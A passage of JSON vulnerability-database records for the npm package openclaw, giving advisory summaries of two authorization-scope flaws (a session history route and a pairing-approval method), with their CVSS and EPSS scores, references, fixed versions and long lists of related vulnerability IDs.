                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35665",
                "GHSA-w6m8-cqvj-pg5v"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9pj9-7b12-jbea"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91302?format=api",
            "vulnerability_id": "VCID-9uyu-y9qv-u7e1",
            "summary": "OpenClaw: Gateway HTTP Session History Route Bypasses Operator Read Scope\n## Summary\n\nThe gateway's HTTP session history route authenticated the caller's bearer token but did not enforce the `operator.read` scope, so a token lacking that scope could still read session history.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nThe HTTP `/sessions/:sessionKey/history` route previously authenticated bearer tokens but skipped the same `operator.read` check used by `chat.history` over WebSocket. Commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea` makes HTTP callers declare operator scopes and rejects history reads that do not include `operator.read`.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`.\n\n## Fix Commit(s)\n\n- `1c45123231516fa50f8cf8522ba5ff2fb2ca7aea`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35657",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08981",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08979",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08998",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35657"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35657",
                    "reference_id": "CVE-2026-35657",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35657"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5jvj-hxmh-6h6j",
                    "reference_id": "GHSA-5jvj-hxmh-6h6j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5jvj-hxmh-6h6j"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route",
                    "reference_id": "openclaw-authorization-bypass-in-http-session-history-route",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/113407?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.25",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.25"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/998171?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28-beta.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28-beta.1"
                }
            ],
            "aliases": [
                "CVE-2026-35657",
                "GHSA-5jvj-hxmh-6h6j"
            ],
            "risk_score": 3.2,
            "exploitability": "0.5",
            "weighted_severity": "6.4",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9uyu-y9qv-u7e1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89099?format=api",
            "vulnerability_id": "VCID-9xgq-vtg2-jucq",
            "summary": "## Impact\n\nOpenClaw's `node.pair.approve` method was placed in the `operator.write` scope instead of `operator.pairing`, which allows unprivileged pairing approval.\n\nThe pairing approval method accepted `operator.write` instead of enforcing the narrower pairing scope and the admin requirement for exec-capable nodes.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42426",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12799",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12838",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12833",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42426"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42426",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42426"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-node-pair-approve-via-operator-write-scope",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
